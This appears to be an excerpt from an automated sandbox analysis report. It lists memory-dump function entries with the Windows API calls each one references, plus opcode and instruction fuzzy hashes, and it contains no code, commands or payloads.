                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 1d3ee88d1b96fb5b00491fe063c4828c4956655a642f4bad41925ebfbc6c8e55
                          • Instruction ID: 37330b813d47613bc1c92ead8cb1c0870e01ab424f96bd4859aba724520e29ed
                          • Opcode Fuzzy Hash: 1d3ee88d1b96fb5b00491fe063c4828c4956655a642f4bad41925ebfbc6c8e55
                          • Instruction Fuzzy Hash: A3310630F042449FC746EB7898559EE7BF1AFC9310F0581BAE249EB396EB349C468791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E123F8
                          • UserClientDllInitialize.USER32 ref: 00E12436
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: f17fc4eab073b13fa38f7f7167ea950d3808fbac4c720eee673f15f7eac4c82f
                          • Instruction ID: 9e40cc4bf3526d6513aae5605ba31a87197b6e01f1c3f260d388ae44ad25e01f
                          • Opcode Fuzzy Hash: f17fc4eab073b13fa38f7f7167ea950d3808fbac4c720eee673f15f7eac4c82f
                          • Instruction Fuzzy Hash: 1821E435F042458FCB45EBB8C8457DE7BF2AF8A315F10846AD209EB396EB349C068751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E860
                          • UserClientDllInitialize.USER32 ref: 00E1E89E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: c16b8481dd2b03e02cf11139f545b7200e02ef07c02befb1989146b085d4a69c
                          • Instruction ID: a1ef4328f03fe47561165f547f3aaad5419bbb77be9ce211f34c475d5208884e
                          • Opcode Fuzzy Hash: c16b8481dd2b03e02cf11139f545b7200e02ef07c02befb1989146b085d4a69c
                          • Instruction Fuzzy Hash: 59115E71F002199F8B84EBB8D4459AEB7F2FBCD220B108429E509E7345EF34AD468B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E980
                          • UserClientDllInitialize.USER32 ref: 00E1E9BE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: dbcf23ce94f89d1b61a22212e9376bf569b0123080aa20021710fa81a27cc000
                          • Instruction ID: 3682e118f60e99f36320662e054f39d14ab190b5c7ba403ac5f7c05a37e97b20
                          • Opcode Fuzzy Hash: dbcf23ce94f89d1b61a22212e9376bf569b0123080aa20021710fa81a27cc000
                          • Instruction Fuzzy Hash: 04113035F001199F8B84EB78D84599EBBF6EB8D610B108469E509F7349EF34AD468BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E122D8
                          • UserClientDllInitialize.USER32 ref: 00E12316
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: f4d20653d671297be9f40a7fa84358995d00b0e8821bd72b626fe49cc6a16b9b
                          • Instruction ID: bc5912a7abcea97c0e718003325e5ca12eda8f16ad5fb14e25fd941e37bce27e
                          • Opcode Fuzzy Hash: f4d20653d671297be9f40a7fa84358995d00b0e8821bd72b626fe49cc6a16b9b
                          • Instruction Fuzzy Hash: 32113031F002199F8B40EB78D84599EB7F6BB8C610B109469E619E7345EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E123F8
                          • UserClientDllInitialize.USER32 ref: 00E12436
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: b569084de7439d3ee92bef38f79a584a8d04879fb395e52b935e1c484353c698
                          • Instruction ID: 9bba936c399ef33b9e99477167c4bd81361ce22598fea3c08dc87dab387b9f87
                          • Opcode Fuzzy Hash: b569084de7439d3ee92bef38f79a584a8d04879fb395e52b935e1c484353c698
                          • Instruction Fuzzy Hash: 23115231F001189F8B40FBB8D84599EB7F2FB8D310B508429E619E7355EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12DB0
                          • UserClientDllInitialize.USER32 ref: 00E12DEE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 11974ed466130e885520c1c941ee83b541d7db4b61fc8e5c5eb48027351064b2
                          • Instruction ID: 7054ba400a05d50e182db25f787e1ca44c8270a8fbf79ddfc125daace7b33de4
                          • Opcode Fuzzy Hash: 11974ed466130e885520c1c941ee83b541d7db4b61fc8e5c5eb48027351064b2
                          • Instruction Fuzzy Hash: 72115E31F00118DF8B80EBBCD8459AEB7F2FB8D210B108429E609E7355EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12ED0
                          • UserClientDllInitialize.USER32 ref: 00E12F0E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: b05b221978a601a44d1e445a2c0b5913b3db2936717464c8397cbfd2d6dbfe1d
                          • Instruction ID: 958fbe4673c88e5e1994428207f975cec216a81b4de50a323a993420e8e84528
                          • Opcode Fuzzy Hash: b05b221978a601a44d1e445a2c0b5913b3db2936717464c8397cbfd2d6dbfe1d
                          • Instruction Fuzzy Hash: 0F115231F001199F8B40FB78D85599EBBF6EB8D620B108429E619F7355EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1EE68
                          • UserClientDllInitialize.USER32 ref: 00E1EEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 83fccbd4adcd6e43495cc7df567f719f469205650814c14a76a044c7cf22ebe0
                          • Instruction ID: 7b6539a644ec63981b41e56da59e3cef3e82b085e33769fa1507d29997c72984
                          • Opcode Fuzzy Hash: 83fccbd4adcd6e43495cc7df567f719f469205650814c14a76a044c7cf22ebe0
                          • Instruction Fuzzy Hash: A4117075F002189FCB40EBB8D4459DE7BF2BB8D210B508429E509E7344EF34AD468B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1EE68
                          • UserClientDllInitialize.USER32 ref: 00E1EEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 5d460904cefd5acc9cad1a388814b96444f6747399a616eccc7722f7a25d32b9
                          • Instruction ID: a13697c7212caa2e70c1e12f2d8db0b3d4d7b9e0bd83c415c4abce01844ccffd
                          • Opcode Fuzzy Hash: 5d460904cefd5acc9cad1a388814b96444f6747399a616eccc7722f7a25d32b9
                          • Instruction Fuzzy Hash: 56113031F002189F8B40EBB8D44599EBBF2BB8D610B508529E509E7345EF34AD418B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E11F40
                          • UserClientDllInitialize.USER32 ref: 00E11F7E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 073d9c9f0eb496c7cf181998459f3202a185aa5b16ae25582691f67f0abc353c
                          • Instruction ID: 48b52e88a37a62f8bb0061ebb103770868d7fc429727421c3adb86a87181c9ed
                          • Opcode Fuzzy Hash: 073d9c9f0eb496c7cf181998459f3202a185aa5b16ae25582691f67f0abc353c
                          • Instruction Fuzzy Hash: 93115231F001189F8B80EBB8D84599EBBF2FF8D210B508469E609E7355EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E740
                          • UserClientDllInitialize.USER32 ref: 00E1E77E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: b12f857c6d0c8154bb39f986cf6d50a410e8fa53cfd743efa77e31debb237d9d
                          • Instruction ID: bc70473fc24b85fb60d85b333fcbd6c633e68b4f7c03825aaf18499d95a791d5
                          • Opcode Fuzzy Hash: b12f857c6d0c8154bb39f986cf6d50a410e8fa53cfd743efa77e31debb237d9d
                          • Instruction Fuzzy Hash: 06115E75F001189F8B80FBBCD4459AEB7F6FB8D210B108829E519E7395EF34AD428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b85b6cc8e22c0819a5e444dce61ca660b98bfd30b3dbe421309e59d65e12d390
                          • Instruction ID: 827b4be524ee9c27b66c166a69a8534aa25ed140661eecb17e827f080330bcc2
                          • Opcode Fuzzy Hash: b85b6cc8e22c0819a5e444dce61ca660b98bfd30b3dbe421309e59d65e12d390
                          • Instruction Fuzzy Hash: 1D51D231E002019FCB19EBB4D844AEEBBB5AF85304F10896AE652EB285DF70A845CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011651A2
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: d3b6af98e5bb576d4d00cbfc39a3609e16a542ea30e5b86dad2f2ca0f7207d85
                          • Instruction ID: f5ba168ec4d878155847c53fd53f72b2b3027c9cc20dfdd4cdc80aec3f930ef8
                          • Opcode Fuzzy Hash: d3b6af98e5bb576d4d00cbfc39a3609e16a542ea30e5b86dad2f2ca0f7207d85
                          • Instruction Fuzzy Hash: 0151C0B1D00308DFDF14CFA9D884ADEBBB6BF48354F64812AE819AB210D7759885CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011651A2
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: CreateWindow
                          • String ID:
                          • API String ID: 716092398-0
                          • Opcode ID: 6d1b9d265a70f9f48f64e61e4bb2aaec2ee3f8a4b6ee200bf9e41bf8841bb337
                          • Instruction ID: 1c1ef2adc0f3345e139dd7f34bc5538925822b29b95aade843b4c81b62c4d537
                          • Opcode Fuzzy Hash: 6d1b9d265a70f9f48f64e61e4bb2aaec2ee3f8a4b6ee200bf9e41bf8841bb337
                          • Instruction Fuzzy Hash: 5141C0B1D00309DFDF14CF99C884ADEBBB6BF48354F64812AE819AB210D7759985CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 01167F01
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: CallProcWindow
                          • String ID:
                          • API String ID: 2714655100-0
                          • Opcode ID: 360a468bd5d3592126234c717b35925ede9b2789b06c603a38ba2915f6c50a0b
                          • Instruction ID: a15c4d88e922c2eaae8d602d03cc1a9d1b786d2ab5758387ff72b917c3832d64
                          • Opcode Fuzzy Hash: 360a468bd5d3592126234c717b35925ede9b2789b06c603a38ba2915f6c50a0b
                          • Instruction Fuzzy Hash: 74415BB5900305CFCB19CF99C488AAABBF9FF48318F14C498E419A7351C775A845CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 0116C212
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: d10c3fbed47a2a0cfec553d5120651abb66d262d0511fc98c6f927a64b8e122c
                          • Instruction ID: e0c9fc2620ecb9ec5093cf759832faf54d6912d073044bbec7d46d393af89720
                          • Opcode Fuzzy Hash: d10c3fbed47a2a0cfec553d5120651abb66d262d0511fc98c6f927a64b8e122c
                          • Instruction Fuzzy Hash: 7131F171804384CFDB14DFA9D5883AEBFF4EB59318F14845EC489AB242C77A5514CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 01164116
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 09cfce19e915636e2c4d19d361b3b1c9a262f5e13b3edcf9edabfadca570a5d4
                          • Instruction ID: 7b8e5750741362cf69687262d72c9932e0d15b7af222de8ae57ce4c327b5769f
                          • Opcode Fuzzy Hash: 09cfce19e915636e2c4d19d361b3b1c9a262f5e13b3edcf9edabfadca570a5d4
                          • Instruction Fuzzy Hash: 5521BAB1C043888FCB15CFAAC4446DEBFF4EF4A214F15809AC458AB652C335944ACFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01166BEF
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: caed26ad310e85b82941d69aac727c028e0ee82d3260f29b9e119c159db1cb0a
                          • Instruction ID: 6ae952ca5534cd27649b7326f7b973b29275738d1253b44cef925934b52e16da
                          • Opcode Fuzzy Hash: caed26ad310e85b82941d69aac727c028e0ee82d3260f29b9e119c159db1cb0a
                          • Instruction Fuzzy Hash: E42103B5900248DFDB10CFA9D584AEEBBF8EB48320F14842AE914A3210D379A954CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01166BEF
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 487fa84ee23f4e30cadef57a83241bbbd72ef8da14bd55eedfb61f99e2c788b0
                          • Instruction ID: 3d27e18bb974eff02cb845bbf7481d3b071f20b3f738338c2414688957f9191a
                          • Opcode Fuzzy Hash: 487fa84ee23f4e30cadef57a83241bbbd72ef8da14bd55eedfb61f99e2c788b0
                          • Instruction Fuzzy Hash: EA21E4B59002089FDB10CF99D584ADEBBF8FB48320F14841AE915A3310D375A954CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00E47B39,00000800), ref: 00E47BCA
                          Memory Dump Source
                          • Source File: 00000005.00000002.915652564.0000000000E40000.00000040.00000010.sdmp, Offset: 00E40000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: b437b97a1e7eec8155aa89fb26f8f4461688498b52762c86cac62390d51c32df
                          • Instruction ID: 95da98f83810a17d3cacee06a6879e51efb74f563b33b3ce72209cd6de0e2be8
                          • Opcode Fuzzy Hash: b437b97a1e7eec8155aa89fb26f8f4461688498b52762c86cac62390d51c32df
                          • Instruction Fuzzy Hash: FF1103B69046098FCB10CF9AD444BDEBBF5EB88314F14842AE559B7700C3B4A945CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00E47B39,00000800), ref: 00E47BCA
                          Memory Dump Source
                          • Source File: 00000005.00000002.915652564.0000000000E40000.00000040.00000010.sdmp, Offset: 00E40000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 3a7845718440abba89f483a715f611e63ed7491855da402c5cf57ce21fd9ca73
                          • Instruction ID: acbd01d69a3959d73855882cec865e0e5159898039fbf74d02a74812aed8cc66
                          • Opcode Fuzzy Hash: 3a7845718440abba89f483a715f611e63ed7491855da402c5cf57ce21fd9ca73
                          • Instruction Fuzzy Hash: 891136B68046099FCB10CF9AD844BDEFBF5EB88314F14842AD455B7600C375A944CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 0116C212
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 3a2d17d51acd54e24580fbacf4360e62727ae83e8f6071b08ad68e8d7c9c7da3
                          • Instruction ID: a47690f1a659f8a7ca7491b8bd2f848cd17c0e13f26d8d4c40fb47328a6e4eb8
                          • Opcode Fuzzy Hash: 3a2d17d51acd54e24580fbacf4360e62727ae83e8f6071b08ad68e8d7c9c7da3
                          • Instruction Fuzzy Hash: 01119A71900305CFDB24DFA9D54879EBBF8EB48314F24882AC449E7241C779A644CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 01164116
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 8bb326696a20d6f62520a9fd8d3f79f14847a231f259058fb85a2a73cc8631f8
                          • Instruction ID: ea3e91e63db8f3d671348b6e4043fa89475f15ff3539a13a5d5b3bbe38c2c480
                          • Opcode Fuzzy Hash: 8bb326696a20d6f62520a9fd8d3f79f14847a231f259058fb85a2a73cc8631f8
                          • Instruction Fuzzy Hash: B91132B5D00649CFDB14CF9AC444BDEFBF8EB49220F14842AD929B7600C379A545CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OleInitialize.OLE32(00000000), ref: 00E4B675
                          Memory Dump Source
                          • Source File: 00000005.00000002.915652564.0000000000E40000.00000040.00000010.sdmp, Offset: 00E40000, based on PE: false
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: 49ff5882f5c9a028bb6f10dc1ffffc8910f1fd2a3303ba5a1fad53a27ccb6c6c
                          • Instruction ID: 4d809f36b11fc46232fc436a7625029447c3de422393b3c62a449129d7f407af
                          • Opcode Fuzzy Hash: 49ff5882f5c9a028bb6f10dc1ffffc8910f1fd2a3303ba5a1fad53a27ccb6c6c
                          • Instruction Fuzzy Hash: 7A1115B5900749CFCB10DF99D448BDEBBF8EB48324F148459D519B7600C375A944CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1EEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 19019cd054cef3429f5242670bee73bdac323f95befd75dddcf70a2a8f824d71
                          • Instruction ID: 282169d8cb0906bd25b0420d0037652a40e028240f834a4e7f1929e0123584fc
                          • Opcode Fuzzy Hash: 19019cd054cef3429f5242670bee73bdac323f95befd75dddcf70a2a8f824d71
                          • Instruction Fuzzy Hash: 2FF08235B04218DFCB02E76894548EC7BF1BF8921071550A6E506FB396DE245C4287A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E89E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 2e8117f42ec378ae6c8c99fac345bace38b388837796f2f8e4390ba33c1ee50c
                          • Instruction ID: 8f34e8c4fceceb73c150304495351c8a91acc59f0e53b26d70baf94ba1fffd7e
                          • Opcode Fuzzy Hash: 2e8117f42ec378ae6c8c99fac345bace38b388837796f2f8e4390ba33c1ee50c
                          • Instruction Fuzzy Hash: 77E0C935B001199B8F48EBA8D4548DDB3E5ABC8225B149065E505E7394DE34A8528761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E9BE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: d3ce43b07c71a777b5fcfe7df3ad2e69d974ed937c5ff797c75241206be442d3
                          • Instruction ID: 9b2858b95522fec521fe8da9517647378ac6e247fa4ef94b637b4be1d1d86f3e
                          • Opcode Fuzzy Hash: d3ce43b07c71a777b5fcfe7df3ad2e69d974ed937c5ff797c75241206be442d3
                          • Instruction Fuzzy Hash: 30E0C935B000198F8F49EBA8D4558DDB7E5ABC8215B109065E50AE7358DE34A9518761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12316
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: ea6c5f68112da6e914be6ebd183d6a51b9bdffcbb0e70dd3b76be4528c3ff265
                          • Instruction ID: f1141d1ad72ee1dc46cede06706f835327a9097e00da144f3dc492958322caa9
                          • Opcode Fuzzy Hash: ea6c5f68112da6e914be6ebd183d6a51b9bdffcbb0e70dd3b76be4528c3ff265
                          • Instruction Fuzzy Hash: 5CE0C935B001198B8F05EBB8D4458DDB3E5BB88225B145065E519E7254DE34A8518B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12436
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 07aeeee7a2d42624d308cf018946f2671f5796a40cba7a40217017cc1a94bf19
                          • Instruction ID: e14f8e052586003e44aac3ac6429ab9fda4aed1621610006fc0d17c6d59ef8f6
                          • Opcode Fuzzy Hash: 07aeeee7a2d42624d308cf018946f2671f5796a40cba7a40217017cc1a94bf19
                          • Instruction Fuzzy Hash: 94E06535B000188F8F08FBB8D8448DCB3E5BBCC228B104465E50AE7394DF34AD118B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12DEE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 659791d73dbc83b305af368dc81ea329f4229bfb9d98135755084da347bbfdfd
                          • Instruction ID: 80a1755c61fd10681af2adc237fa70951232e6b82de1d009c7650a21cc41423e
                          • Opcode Fuzzy Hash: 659791d73dbc83b305af368dc81ea329f4229bfb9d98135755084da347bbfdfd
                          • Instruction Fuzzy Hash: BDE0C935B101188B8F45EBB8D4548DDB3E5BB8C225B105065D506E7354EE34A8528761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12F0E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 40446cf83a60b354fdbb17a1ee0417981760f2ab6393d204fd36e6f6781a2046
                          • Instruction ID: 568a86974aa9624d640d52860402a792227543ed82ead6ff786259d6e12484de
                          • Opcode Fuzzy Hash: 40446cf83a60b354fdbb17a1ee0417981760f2ab6393d204fd36e6f6781a2046
                          • Instruction Fuzzy Hash: ECE03235B000198B8F08FBA8D8548DCB3E5AB8C228B108064E50AE7298EE34A8528B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1EEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: d3b97667d84055b02a935e5b43612f182f3a84d9adae66bafe6aea02f152d3c2
                          • Instruction ID: a882bfa50bdc01edee1cc88c89c54e6ab233d2e566366245c9d4dc33cc55b107
                          • Opcode Fuzzy Hash: d3b97667d84055b02a935e5b43612f182f3a84d9adae66bafe6aea02f152d3c2
                          • Instruction Fuzzy Hash: 61E0C935B001189F8F44FBA8D4458DDB3E5BB8C225B105065E505E7354EF35A8518761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E11F7E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: bb197fdddbfb06e878f7b63c384d5eaca3ecb5a23232434c61045f54e080bc4f
                          • Instruction ID: c80e9470f8fc9ed95ef21e61d61c5bfd44f2dc68b9bb793cae360622d9a1376b
                          • Opcode Fuzzy Hash: bb197fdddbfb06e878f7b63c384d5eaca3ecb5a23232434c61045f54e080bc4f
                          • Instruction Fuzzy Hash: F2E0C935B001199B8F44EBA8D4558DDB7E5AB8C225B105065E505E7354EF34A8528761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E77E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: aca5f15979383a20d002d07599ea0f2e2e6254d1504e70c47c55f3763101ea2f
                          • Instruction ID: 93ea208d7879230cd2d0be1b2976989085b57fe6a1bb30a47c7ae2b6b49fe9b2
                          • Opcode Fuzzy Hash: aca5f15979383a20d002d07599ea0f2e2e6254d1504e70c47c55f3763101ea2f
                          • Instruction Fuzzy Hash: 6EE0C935B001188B8F44FBB8D4548DDB3E5BBC8225B105465E515E7394DE35A9518761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.916002064.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f55680e1d0e7df0e2e9ca15f2cab516d5ddbc150a63aa38fdf981034d315742e
                          • Instruction ID: bb1001bba4cf9e7b9b43d425415478102d64b32d5365dba6697ee54bce08f825
                          • Opcode Fuzzy Hash: f55680e1d0e7df0e2e9ca15f2cab516d5ddbc150a63aa38fdf981034d315742e
                          • Instruction Fuzzy Hash: 8F2145B1500200DFCB01DF94D8C4F6ABFA6FB88728F2485ADEA494F646C336D446CBA1
                          Uniqueness

